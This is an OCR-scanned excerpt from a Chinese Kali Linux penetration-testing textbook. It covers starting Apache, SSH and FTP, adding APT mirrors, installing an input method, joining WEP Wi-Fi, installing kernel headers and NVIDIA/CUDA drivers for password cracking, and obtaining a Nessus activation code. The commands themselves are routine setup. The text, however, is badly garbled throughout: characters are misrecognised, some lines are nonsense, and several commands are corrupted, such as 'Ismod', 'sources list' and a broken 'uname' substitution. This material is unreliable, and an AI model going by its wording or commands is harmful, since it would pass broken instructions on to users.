统 后 ， 就 可 以 使 用 各 种 的 渗透 工具 对 计算 机 做 测试 。 为 了 方便 后 和 面 章节 内 容 的 学 习 ， 本 市 
将 介绍 一 下 Kali Linux 的 基本 设置 。 


1.6.1 局 动 默认 的 服务 


Kali Linux 自 市 了 儿 个 网 络 服务 ， 它 们 是 非常 有 用 的 。 但 是 默认 是 禁用 的 。 在 这 里 ， 
将 介绍 使 用 各 种 方法 设置 并 启动 每 个 服务 。 


1. 启动 Apache 服 务 


局 动 Apache 服务 。 执 行 命令 如 下 所 示 : 
root@kali:~# service apache2 start 


得 出 信息 如 下 所 示 : 


[ ok ] Starting web server apache2. 


输出 的 信息 表示 Apache 服务 已 经 启动 。 为 了 确认 服务 是 否 正在 运行 ， 可 以 在 浏览 
中 访问 本 地 的 地 址 。 在 浏览 器 中 访问 本 地 的 地 址 ， 如 果 服 务 器 正在 运行 ， 将 显示 如 图 1.59 
所 示 的 界面 。 


Iceweasel "lax 
File Edit View History Bookmarks Tools Help 
| I http//192.168.41.235/ T3 


«ma vom a9 


Most Visitedv [§Offensive Security “& Kali Linux X Kali Docs EBExploit-DB W Aircrack-ng 


It works! 


This is the default web page for this server. 


The web server software is running but no content has been added, yet. 


图 1.59 Apache 服务 器 访问 界面 


2. 启动 Secure Shell (SSH) 服务 
启动 Secure Shell (SSH) 服务 。 执 行 命令 如 下 所 示 : 


se。 JQ o 
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root@kali:~# service ssh start 
[ ok ] Starting OpenBSD Secure Shell server: sshd. 


看 到 以 上 的 输出 表示 SSH 服务 已 经 启动 。 为 了 确认 服务 的 端口 是 否 被 监听 ,执行 如 下 
所 示 的 命令 : 


root@kali:~# netstat -tpan | grep 22 
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 7658/sshd 


tcp6 0 Up DR LISTEN 7658/sshd 
3. 启动 FTP 服 务 


FTP 服务 默认 是 没有 安装 的 ， 所 以 首先 需要 安装 FTP 服务 器 。 在 Kali Linux 操作 系统 
的 软件 源 中 默认 没有 提供 FTP 服务 器 的 安装 包 ， 这 里 需要 配置 一 个 软件 源 。 配 置 软件 源 的 
具体 操作 步骤 如 下 所 示 。 

CD 设置 APT 源 。 回 软件 源 文件 /etc/aptsources.list 中 添加 以 下 几 个 镜像 网 站 。 执 行 命 
令 如 下 所 示 : 

root@kali:~# vi /etc/apt/sources list 

deb http://mirrors.neusoft.edu.cn/kali/ kali main non-free contrib 


deb-src http://mirrors.neusoft.edu.cn/kali/ kali main non-free contrib 
deb http://mirrors.neusoft.edu.cn/kali-security kali/updates main contrib non-free 


添加 完 以 上 几 个 源 后 ， 将 保存 sources.list 文件 并 退出 。 在 该 文件 中 ， 添 加 的 软件 源 是 
根据 不 同 的 软件 库 分 类 的 。 其 中 ，deb 指 的 是 DEB 包 的 目录 ; deb-src 指 的 是 源码 目录 。 如 
果 不 目 己 看 程序 或 者 编译 的 话 ， 可 以 不 用 指定 deb-src。 由 于 deb-src 和 deb 是 成 对 出 现 的 ， 
可 以 不 指定 deb-src， 但 是 当 需 要 deb-src 的 时 候 ，deb 是 必须 指定 的 。 

(2) 添加 完 软 件 源 ， 需 要 更 新 软件 包 列 表 后 才 可 以 使 用 。 更 新 软件 包 列 表 ， 执 行 命令 
如 下 所 示 : 

root@kali:~# apt-get update 

更 新 完 软件 列表 后 ， 会 自动 退出 程序 。 

(3) 安装 FTP 服务 器 。 执 行 命令 如 下 所 示 : 

root@kali:~# apt-get install pure-ftpd 

安装 成 功 FTP 服务 器 ， 束 可 以 局 动 该 服务 了 。 执 行 命令 如 下 所 示 : 

root@kali:~# service pure-ftpd start 

4. 安 半 中文 输 入 法 

Kali Linux 操作 系统 献 认 也 没有 安装 中 文 输入 法 ， 下 面 将 介绍 安装 小 企鹅 中 文 输入 法 。 
执行 命令 如 下 所 示 : 

root@kali:~# apt-get install fcitx-table-wbpy ttf-wqy-microhei ttf-wqy- zenhei 

执行 以 上 命令 后 ， 小 企鹅 中 文 输入 法 就 安装 成 功 了 。 安 装 成 功 后 ， 需 要 启动 该 输入 法 
后 才 可 以 使 用 。 局 动 小 企鹅 中 文 输入 法 ， 执 行 命 令 如 下 所 示 : 


root@kali:~# fcitx 
root@kali:~# [INFO] /build/buildd-fcitx_4.2.4.1-7-i386-l4w6Z_/fcitx-4.2.4.1 /src/lib/fcitx/addon.c:100- 
加 载 附 加 组 件 配置 文件 : fcitx-table.conf 


. IO 。 
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[INFO] /build/buildd-fcitx 4.2.4.1-7-i386-Mw62Z /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附加 组 件 配置 
文件 : fcitx-xim.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附加 组 件 配置 
文件 : fcitx-lua.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配置 
文件 : fcitx-pinyin.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-autoeng.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-xkb.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-ipc.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配置 
文件 : fcitx-kimpanel-ui.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-vk.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附加 组 件 配置 
文件 : fcitx-quickphrase.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附加 组 件 配置 
文件 : fcitx-remote-module.conf 

[INFO] /build/buildd-fcitx_4.2.4.1-7-i386-l4w6Z_/fcitx-4.2.4.1/srcilib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-punc.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-dbus.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-keyboard.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4w6Z. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附加 组 件 配置 
文件 : fcitx-chttrans.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-fullwidth-char.conf 

[INFO] /build/buildd-fcitx_4.2.4.1-7-1386-l4w6Z_/fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附加 组 件 配置 
文件 : fcib-imselector.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-x11.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附 加 组 件 配 置 
文件 : fcitx-classic-ui.conf 

[INFO] /build/buildd-fcitx 4.2.4.1-7-/386-l4wGZ. /fcitx-4.2.4.1/src/lib/fcitx /addon.c:100- 加 载 附加 组 件 配置 
文件 : fcitx-xkbdbus.conf 

[INFO] /build/buildd-fcitx_4.2.4.1-7-i386-l4w6Z_/fcitx-4.2.4.1/src/im/table /table.c:155- 加 载 码 表 文 件 : 
wbpy.conf 

[WARN] /build/buildd-fcitx_4.2.4.1-7-i386-l4w6Z_/fcitx-4.2.4.1/src/frontend /xim/xim.c:168- 请 设置 环境 变 
©% XMODIFIERS 


输出 的 信息 表示 ， 访 输入 法 在 局 动 时 加 载 的 一 些 配 置 文件 。 最 后 一 行 提 示 需 要 设置 环 
境 变量 XMODIFIERS， 某 些 程序 往往 因为 XMODIFIERS 环境 变量 设置 不 正确 导致 应 用 程 
序 无 法 使 用 。 设 置 XMODIFIERS 环境 变量 方法 如 下 CUA Bash 为 例 ) : 

export XMODIFIERS="@im=YOUR_XIM_NAME" 

语法 中 的 YOUR XIM NAME 为 XIM 程序 在 系统 注册 的 名 字 。 应 用 程序 启动 时 会 增 
加 该 变量 查找 相应 的 XIM 服务 器 。 因 此 ， 即 便 系统 中 同时 运行 了 肴 干 个 XIM 程序 ， 一 个 
应 用 程序 在 某 个 时 刻 也 只 能 使 用 一 个 XIM 输入 法 。 

fcitx 缺 省 注册 的 XIM 名 为 feitx, 但 如 果 fcitx 启动 时 XMODIFIERS 已 经 设置 好 ，fcitx 
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会 自动 以 系统 的 设置 来 注册 合适 的 名 字 。 如 果 没 有 设置 好 ， 使 用 以 下 方法 设置 。 
一 般 可 以 在 ~/.bashrc 文件 中 添加 以 下 内 容 。 如 下 所 示 : 


export XMODIFIERS="@im=fcitx" 


export XIM=fcitx 


export XIM_PROGRAM=fcitx 


添加 并 保存 以 上 内 容 后 ,重新 登录 当前 用 户 ，feitx 输入 法 将 目 动 运行 。 如 果 没 有 局 动 ， 


则 在 终 站 执行 如 下 命令 : 
root@kali:~# fcitx 
执行 以 上 命令 后 ， 将 会 在 屏幕 的 右上 角 弹 出 一 个 键盘 ， 说 明 该 输入 法 已 经 局 动 。 


鹅 输入 法 默认 支持 汉语 、 拼 音 、 双 拼 和 五 笔 拼 音 四 种 输入 法 ， 
Ctrl+Shift 组 合 键 切换 。 


小 企 


这 几 种 输入 法 默认 使 用 


如 果 想 要 修改 输入 法 之 间 的 切换 键 , 右 击 果 面 右上 角 的 键盘 ， 将 弹出 如 图 1.60 所 示 的 


Jr hl o 


在 该 界面 选择 “配置 ”命令 , 将 显示 如 图 1.61 所 示 的 界面 。 在 该 界面 单 击 “全 局 配置 ” 


， 将 显示 如 图 1.62 所 示 的 界面 。 


es MEC Uu 
} 


键盘 - 汉语 


在 线 帮助 em 
切换 虚拟 键盘 

E "A 

输入 法 , 

皮肤 > 


配置 当前 输入 法 
退出 


图 1.60 fcitx 界面 图 1.61 Feitx 配置 


Fcitx 配 置 — i 
| 输入 法 / 全 局 配置 | 附加 组 件 | 
| 快捷 键 | 程序 | 输出 外观 | 


切换 激活 / 非 激活 输入 法 CTRL_SPACE | z 


额外 的 激活 输入 法 快捷 键 | Æ Ctrl 


激活 输入 法 


取消 激活 输入 法 


启用 输入 法 间 切 换 a 


输入 法 切换 键 | Ctrl Shift 


双击 切换 键 时 切换 P 


图 1.62 全 局 配置 
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从 该 界面 可 以 看 到 各 种 快捷 键 的 设置 , 根据 目 己 习惯 用 的 快捷 键 进行 设置 。 设置 完 后 ， 
单 击 “ 应 用 ” 鬼 钮 。 


5. 停止 服务 
停止 一 个 服务 的 语法 格式 如 下 所 示 : 


service <servicename> stop 


<servicename> 表 示 用 户 想 要 停止 的 服务 。 
停止 Apache 服务 ， 执 行 命令 如 下 所 示 : 


root@kali:~# service apache2 stop 
[ ok ] Stopping web server: apache2 ... waiting . 


从 输出 的 信息 中 ， 可 以 看 到 Apache 服务 停止 成 功 。 
6. 设置 服务 开机 启动 
设置 服务 开机 局 动 的 语法 格式 如 下 所 示 : 


update-rc.d -f <servicename> defaults 


<servicename> 表 示 用 户 想 要 开机 局 动 的 服务 。 

设置 SSH 服务 开局 目 局 动 : 

root@kali:~# update-rc.d -f ssh defaults 

update-rc.d: using dependency based boot sequencing 

update-rc.d: warning: default stop runlevel arguments (0 1 6) do not match ssh Default-Stop 
values (none) 


insserv: warning: current start runlevel(s) (empty) of script ssh' overrides LSB defaults (2 3 4 5). 
insserv: warning: current stop runlevel(s) (2 3 4 5) of script 'ssh' overrides LSB defaults (empty). 


从 输出 的 信息 中 可 以 看 到 ，SSH 服务 默认 启动 了 2、3、4 和 5 运行 级 别 。 则 以 后 系统 
重启 后 ，SSH 服务 将 自动 运行 。 


1.6.2 设置 无 线 网 络 


无 线 网 络 既 包括 允许 用 户 建 立 远 距离 无 线 连接 的 全 球 语音 和 数据 网 络 ， 也 包括 近 距 离 
无 线 连接 进行 优化 的 红外 线 技术 及 射频 技术 。 本 小 节 将 介绍 Wicd 网 络 管理 器 的 设置 ， 使 
用 它 安 全 的 连接 到 无 线 网 络 。 设 置 无 线 网 络 能 让 用 户 很 好 地 使 用 Kali Linux 无 线 ， 做 渗透 
测试 ， 而 不 需要 依赖 一 个 以 太 网 ， 这 样 使 的 用 户 使 用 电脑 非常 的 目 由 。 

设置 无 线 网 络 的 具体 操作 步骤 如 下 所 示 。 

(1) 局 动 Wicd 网 络 管理 右 。 有 两 种 方法 ， 一 种 是 命令 行 ， 一 种 是 图 形 界面 。 在 果 面 
依次 选择 “应 用 程序 ”|“ 互 联网 ”|Wicd Network Manager 命令 ， 将 显示 如 图 1.63 所 示 的 
界面 。 如 过 在 图 形 困 面 上 找 不 到 WicdNetwork Manager, Hii AAPA KA Wicd 软件 
fo HP H ACES DIVER KLEE, RE Wicd 软件 包 安 装 上 即 可 。 

ALES vin UAT UU Pim 

wicd-gtk --no-tray 
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执行 以 上 命令 后 ， 将 显示 如 图 1.63 所 示 的 界面 。 

(2) 从 该 界面 可 以 看 到 所 有 能 搜索 到 的 无 线 网 络 ， 并 且 很 清楚 的 看 到 每 个 无 线 网 络 的 
加 密 方 法 、 使 用 的 频道 及 无 线 信号 的 强度 。 本 例 中 选择 使 用 WEP 加 密 的 无 线 网 络 Testl, 
单 击 Testl 的 “属性 ”按钮 ， 将 显示 如 图 1.64 所 示 的 界面 。 


| Testi - 属性 

口 使 用 静态 IP 

P [| 
子 网 掩 码 | | 
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DNS RF 1 | 
从 以 下 网 络 选择 : 
一 DNS IRF Z 2 E 
口 自动 连接 到 此 网 络 
will 口 自动 连接 到 此 网 络 [] DHCP Hostname Kali 
C) 所 有 共享 该 essid 的 网 络 均 使 用 该 设置 
使 用 加 密 
yztxtyOO2 100% WPA2 须 道 1 WEP (Passphrase) - 
口 自动 连接 到 此 网 络 


Wb) D 自动 连接 到 此 网 络 Passphrase 
Lj 


k 


yztxty 100% WPAZ 频道 11 
自动 连接 到 此 网 络 
aul - — 
EEC | 


图 1.6 Wicd 网 络 管理 器 图 1.64 属性 设置 


(3) 在 该 界面 选择 “使 用 加 密 ” 复 选 枉 ， 人 然后 选择 加 密 方 式 并 输入 密码 。 如 条 不 想 显 
示 密 码 字 符 时 ， 不 要 勾 选 密码 文本 框 前 面 的 复 选 枉 。 设 置 完 后 ， 单 击 “ 确 定 ”按钮 ， 将 返 
回 到 图 1.63 界面 。 此 时 在 该 界面 单 击 “ 连 接 ” 投 钮 ， 残 可 以 连接 到 Testl 网 络 。 
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上 一 革 介 绍 了 Kali Linux WMS Re. AORTA Kali 的 配置 ， 以 便于 用 户 能 元 分 
利用 它 。 本 章 主 要 介绍 如 何 配置 内 核 头 文件 、 配 置 额 外 安全 工具 和 设置 ProxyChains 等 。 
本 章 主 要 知识 点 如 下 : 

口 准备 内 核 头 文件 ; 

O 应 用 更 新 并 配置 额外 的 安全 工具 ; 

口 ii ProxyChains; 

O 目录 加 密 。 


21 准备 内 核 头 文件 


内 核 头 文件 是 Linux 内 核 的 源 代码 。 有 时 候 ， 用 户 需 要 编 详 内 核 头 文件 代码 ， 为 以 后 
使 用 内 核 头 文件 做 准备 ， 本 市 将 介绍 编译 内 核 头 文件 的 详细 步骤 。 

准备 内 核 尖 文件 的 具体 操作 步骤 如 下 所 示 。 

(Oo 更 新 软件 包 列 表 。 执 行 命令 如 下 所 示 : 


root@Kali:~# apt-get update 
4 th ERU P AN: 


Binary 20130905-08:50] kali/non-free Translation-en 

获取 : 1 http://mirrors.neusoft.edu.cn kali Release.gpg [836 B] 

获取 : 2 http://mirrors.neusoft.edu.cn kali/updates Release.gpg [836 B] 
命中 http://mirrors.neusoft.edu.cn kali Release 

获取 : 3 http://mirrors.neusoft.edu.cn kali/updates Release [11.0 kB] 
命中 http://mirrors.neusoft.edu.cn kali/main i386 Packages 

命中 http://mirrors.neusoft.edu.cn kali/non-free i386 Packages 

命中 http://mirrors.neusoft.edu.cn kali/contrib i386 Packages 

获取 : 4 http://security.kali.org kali/updates Release.gpg [836 B] 

获取 : 5 http://mirrors.neusoft.edu.cn kali/updates/main i386 Packages [205 kB] 
获取 : 6 http://http.kali.org kali Release.gpg [836 B] 

命中 http://mirrors.neusoft.edu.cn kali/updates/contrib i386 Packages 
命中 http://http.kali.org kali Release 

命中 http://mirrors.neusoft.edu.cn kali/updates/non-free i386 Packages 
获取 : 7 http://security.kali.org kali/updates Release [11.0 kB] 

命中 http://http.kali.org kali/main Sources 

获取 : 8 http://security.kali.org kali/updates/main i386 Packages [205 kB] 
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72.8% -http://mirrors.neusoft.edu.cn kali/contrib Translation-zh_CN 
忽略 http://mirrors.neusoft.edu.cn kali/contrib Translation-zh 


4f CH EV fei A ee CE E TK DP RE PEP CE UEP i BREE BIN Ta], A 
朱 网 速 好 的 话 ， 更 新 的 速度 会 快 一 点 。 由 于 篇 幅 的 原因 ， 这 里 只 列 出 了 一 少 部 分 的 输出 
信息 。 

(2) 使 用 apt-get 命令 准备 内 核 头 文件 。 执 行 命令 如 下 所 示 : 


root@Kali:~# apt-get install linux-headers- “uname -r 


正在 读 取 软 件 包 列表 ... 完成 


正在 分 析 软 件 包 的 依赖 关系 树 
正在 读 取 状态 信息 ... 完成 


Package 'linux-headers' is not installed, so not removed 
注意 ， 根 据 正则 表达 式 3.12-kali1-686-pae 选中 了 nvidia-kernel-3.12-kali1- 686-pae 
注意 ， 根 据 正则 表达 式 3.12-kali1-686-pae 选中 了 linux-image-3.12-kali1-686-pae 
注意 ， 根 据 正则 表达 式 3.12-kali1-686-pae 选中 了 linux-image-3.12-kali1-686- pae-dbg 
注意 ， 根 据 正 则 表达 式 3.12-kali1-686-pae 选中 了 linux-modules-3.12-kali1- 686-pae 
注意 ， 根 据 正 则 表达 式 3.12-kali1-686-pae 选中 了 linux-latest-modules-3.12- kali1-686-pae 
注意 ， 根 据 正 则 表达 式 3.12-kali1-686-pae 选中 了 linux-headers-3.12-kali1- 686-pae 
注意 ， 选 取 linux-image-3.12-kali1-686-pae 而 非 linux-modules-3.12-kali1- 686-pae 
注意 ， 选 取 linux-image-686-pae 而 非 linux-latest-modules-3.12-kali1-686-pae 
linux-image-3.12-kali1-686-pae 已 经 是 最 新 的 版 本 了 。 
linux-image-3.12-kali1-686-pae 被 设置 为 手动 安装 。 
linux-image-686-pae 已 经 是 最 新 的 版 本 了 。 
下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 
libmozjs22d libnfc3 libruby libwireshark2 libwiretap2 libwsutil2 python-apsw 
ruby-crack ruby-diff-Ics ruby-rspec ruby-rspec-core ruby-rspec- 
expectations 
ruby-rspec-mocks ruby-simplecov ruby-simplecov-html xulrunner-22.0 
Use 'apt-get autoremove' to remove them. 
和 针 会 安装 下 列 额外 的 软件 包 : 
glx-alternative-mesa glx-alternative-nvidia glx-diversions 
linux-headers-3.12-kali1-common linux-kbuild-3.12 nvidia-alternative 
nvidia-installer-cleanup nvidia-kernel-common 
建议 安装 的 软件 包 : 
nvidia-driver 
下 列 【 新 】 软 件 包 将 被 安装 : 
glx-alternative-mesa glx-alternative-nvidia glx-diversions 
linux-headers-3.12-kali1-686-pae linux-headers-3.12-kali1-common 
linux-image-3. 12-kali1-686-pae-dbg linux-kbuild-3.12 nvidia-alternative 
nvidia-installer-cleanup nvidia-kernel-3. 12-kali1-686-pae 
nvidia-kernel-common 
升级 了 0 个 软件 包 ， 新 安装 了 11 TÉÓXÍREL BHA 0 个 软件 包 ， 有 5 个 软件 包 未 被 升级 。 
需要 下 载 361 MB 的 软件 包 。 
解 讨 缩 后 会 消耗 掉 1,812 MB 的 额外 空间 。 
您 布 望 继续 执行 吗 ? [Y/n]y 


输出 的 信息 显示 了 linux-headers 相关 软件 包 的 一 个 信息 。 提 示 将 会 安装 哪些 软件 包 太 
软件 包 的 大 小 等 信息 。 此 时 输入 y， 继 续 安 装 。 安 装 完 后 ， 将 退出 程序 。 

(3) 复制 generated 下 的 所 有 内 容 。 执 行 命令 如 下 所 示 : 

root@Kali:~# cd /usr/src/linux-headers-3.12-kali1-686-pae/ 
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root@Kali:/usr/src/linux-headers-3.12-kali1-686-pae# cp -rf include/generated/* include/linux/ 


(4) 编译 内 核 头 文件 代码 。 
22 安装 并 配置 NVIDIA 显卡 驱动 


显卡 驱动 程序 就 是 用 来 驱动 显卡 的 程序 ， 它 是 便 件 所 对 应 的 软件 。 驱 动 程 序 即 添加 到 
操作 系统 中 的 一 小 块 代码 ， 其 中 包含 有 关 便 件 设备 的 信息 。 有 了 此 信息 ， 计 算 机 就 可 以 与 
设备 进行 通信 。 驱动 程序 是 便 件 厂商 根据 操作 系统 编写 的 配置 文件 , 可 以 说 没有 驱动 程序 ， 
计算 机 中 的 便 件 就 无 法 工作 。 操 作 系统 不 同 ， 人 硬件 的 驱动 程序 也 不 同 。 本 节 将 介绍 在 Kali 
中 安装 NVIDIA 显卡 驱动 的 方法 。 

"7 NVIDIA 显卡 驱动 的 具体 操作 步骤 如 下 所 示 。 

(1) 将 开源 的 NVIDIA 驱动 nouveau 加 入 黑 名 单 。 方 法 如 下 所 示 : 


root@kali:~# vi /etc/modprobe.d/blacklist.conf 
blacklist nouveau 


以 上 信息 表示 在 blacklist.conf 文件 中 添加 了 blacklist nouveau 一 行内 容 。 
(2) 查看 当前 的 系统 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# uname -a 
Linux kali 3.12-kali1-kali-amd64 #1 SMP Debian 3.12.6-2kali1 (2014-01-06) x86_64 GNU/Linux 


从 输出 的 信息 中 可 以 看 到 当前 系统 安装 的 是 Kali， 其 内 核 版 本 为 3.12， 系 统 架 构 是 
x86 64 位 。 
(3) 安装 Linux 头 文 件 。 执 行 命令 如 下 所 示 : 


root@kali:~# aptitude -r install linux-headers-$(uname -r) 

下 列 “ 新 ”软件 包 将 被 安装 。 
linux-headers-3.12-kali1-686-pae linux-headers-3.12-kali1-common{a} 
linux-kbuild-3.12{a} 

下 列 软件 包 将 被 “删除 ”: 
firmware-mod-kit(u) libadns1{u} libcrypto++9{u} liblzma-dev{u} 
libsmi2-common(u) libwebkit-dev(u) msgpack-python{u} p/zip{u} 
python-adns{u} python-bs4{u} python-easygui{u} python-ipy{u} 
python-levenshtein{u} python-mechanize{u} python-metaconfig{u} 
python-paramiko{u} python-pycryptopp{u} python-pysnmp4{u} 
python-pysnmp4-apps{u} python-pysnmp4-mibs{u} sqlmap{u} unrar-free{u} 

0 个 软件 包 被 升级 ， 新 安装 3 个 ，22 个 将 被 删除 ， 同时 206 个 将 不 升级 。 

需要 获取 4,848 kB 的 存档 。 解 包 后 将 释放 55.4 MB. 

您 要 继续 吗 ? [Y/n] y 


以 上 输出 信息 显示 了 当前 要 安装 的 软件 包 数 、 将 被 删除 的 软件 包 和 升级 的 软件 包 等 。 
(4) 安装 NVIDIA 内 核 。 执 行 命令 如 下 所 示 : 


root@kali:~# apt-get install nvidia-kernel-3.12-kali1-adm64 
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执行 以 上 命令 后 ， 将 显示 安装 nvidia-kemel 包 的 安装 过 程 。 此 时 不 需要 手动 设置 任何 
信息 ， 将 上 自动 安装 完成 。 
(5) 安装 NVIDIA 驱动 nvidia-kernel-dkms 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# aptitude install nvidia-kernel-dkms 

下 列 “ 新 ”软件 包 将 被 安装 。 
dkms{a} glx-alternative-mesa{a} glx-alternative-nvidia{a} 
glx-diversions(a) libgl1-nvidia-glx(a) libvdpau1 {a} 
linux-headers-3.12-kali1-686-pae{a} linux-headers-3.12-kali1-common{a} 
linux-headers-686-pae(a) linux-kbuild-3.12{a} nvidia-alternative{a} 
nvidia-driver{a} nvidia-installer-cleanup{a} nvidia-kernel-common{a} 
nvidia-kernel-dkms nvidia-vdpau-driver{a} xserver-xorg-video-nvidia{a} 

0 个 软件 包 被 升级 ， 新 安装 17 个 ，0 个 将 被 删除 ， 同时 207 个 将 不 升级 。 

需要 获取 29.4 MB 的 存档 。 解 包 后 将 要 使 用 108 MB. 

您 要 继续 吗 ? [Y/n] y 


以 上 输出 信息 显示 了 将 安 疙 的 软件 包 及 软件 包 的 大 小 。 此 时 输入 y, ARBRE. TER 
装 过 程 中 ， 会 出 现 如 图 2.1 所 示 的 界面 。 


Configuring xserver-xorg-video-nvidia 


Manual configuration required to enable NVIDIA driver 


The NVIDIA driver is not yet configured; it needs to be enabled in 
xorg.conf before it can be used. 


Please see the package documentation for instructions. 


图 2.1 配置 xserver-xorg 


该 界面 提示 需要 配置 xserver-xorg-video-nvidia。 在 该 界面 单 击 OK 按钮 ， 后 和 面 手动 进 
行 配 置 。 
(6) Z% NVIDIA 显卡 驱动 应 用 程序 nvidia-xconfig 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# aptitude install nvidia-xconfig 

(7) 生成 Xorg 服务 配置 文件 。 执 行 命令 如 下 所 示 : 
root@kali:~# nvidia-xconfig 

执行 以 上 命令 后 ， 将 输出 如 下 所 示 的 信息 。 


WARNING: Unable to locate/open X configuration file. 
New X configuration file written to '/etc/X11/xorg.conf 


输出 的 信息 ， 表 示 重 新 生成 了 xorg.conf 文件 。 然 后 ， 重 新 启动 系统 。 
(8) 检查 NVIDIA 显卡 驱动 是 否 成 功 安装 。 首 先 检 查 GLX 模块 ， 执 行 命令 如 下 所 示 : 


root@kali:~# glxinfo | grep -i "direct rendering" 
direct rendering: Yes 


检查 NVIDIA 驱动 模块 。 执 行 命 令 如 下 所 示 : 
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root@kali:~# Ismod | grep nvidia 

nvidia 9442880 29 

i2c_core 24129 212c i801,nvidia 

root@kali:~# Ismod | grep nouveau 

通过 查看 以 下 文件 的 内 容 ， 确 定 开 源 的 NVIDIA 驱动 nouveau 是 否 被 加 入 黑 名 单 ， 如 
下 所 示 : 

root@kali:~# cat /etc/modprobe.d/nvidia.conf 

alias nvidia nvidia-current 

remove nvidia-current rmmod nvidia 

root@kali:~# cat /etc/modprobe.d/nvidia-blacklists-nouveau.conf 

# You need to run "update-initramfs -u" after editing this file. 

# see #580894 

blacklist nouveau 


root@kali:~# cat /etc/modprobe.d/nvidia-kernel-common.conf 

alias char-major-195* nvidia 

options nvidia NVreg_DeviceFileUID=0 NVreg_DeviceFileGID=44 NVreg Device FileMode-0660 
# To enable FastWrites and Sidebus addressing, uncomment these lines 

# options nvidia NVreg_EnableAGPSBA=1 

# options nvidia NVreg_EnableAGPFW=1 


看 到 以 上 输出 信息 ， 就 表示 nouveau 已 被 加 入 黑 名 单 。 

为 了 加 快 用 户 破 解 一 些 大 数据 文件 ， 需 要 安装 CUDA tiles seas Unified Device 
Architecture) > CUDA 是 一 种 由 NVIDIA 推出 的 通用 并 行 计 算 染 构 ， 该 染 构 使 GPU 能 够 
解决 复杂 的 计算 问题 。 

安装 NVIDIA CUDA 工具 集 和 NVIDIA openCL。 执 行 命令 如 下 所 示 : 


root@kali:~# aptitude install nvidia-cuda-toolkit nvidia-opencl-icd 


执行 以 上 命令 后 ， 如 果 输 出 过 程 中 没有 出 错 的 话 ， 表 示 该 软件 包 安 装 成 功 。 以 后 就 可 
以 使 用 CUDA 破解 加 密 的 大 数据 文件 。 


23 应 用 更 新 和 配置 额外 安全 工具 


本 市 将 介绍 更 新 Kali 的 过 程 和 配置 一 些 额外 的 工具 。 这些 工具 在 后 面 的 章节 中 将 是 有 
用 的 。Kali 软件 包 不 断 地 更 新 和 发 布 之 间 , 用 户 很 快 发 现 一 套 新 的 工具 比 最 初 在 DVD ROM 
上 下 载 的 软件 包 更 有 用 。 本 节 将 通过 更 新 安 闭 的 方法 ， 获 取 Nessus 的 一 个 激活 码 。 最 后 安 
+e Squid. 

应 用 更 新 和 配置 额外 安全 工具 的 具体 操作 步骤 如 下 所 示 。 

(1) 更 新 本 地 软件 包 列 表 库 。 执 行 命令 如 下 所 示 : 

root@Kali:~# apt-get update 


执行 以 上 命令 后 ， 需 要 等 待 一 段 时 间 。 执 行 完 后 ， 会 自动 退出 程序 。 
(2) 升级 已 存在 的 包 。 执 行 命令 如 下 所 示 : 


root@Kali:~# apt-get upgrade 
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(3 六 升级 到 最 新 版 本 。 执 行 命令 如 下 所 示 : 
root@Kali:~# apt-get dist-upgrade 


(4) 从 httpz//www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code 官 


网 获取 一 个 激活 码 。 在 浏览 堪 中 输入 该 地 址 后 ， 将 显示 如 图 2.2 所 示 的 界面 。 


tenable 


network security 


Overview ^ What'sNew Plugins Evaluate Download 


Obtain an Activation Code 


Using Nessus at Using Nessus at 1 
Work? E Home? ft 


A Nessus® subscription is Nessus Home is free for 
required for all uses of Nessus outside non-commercial, home use only. 
of the home. 


图 2.2 获取 激活 公 


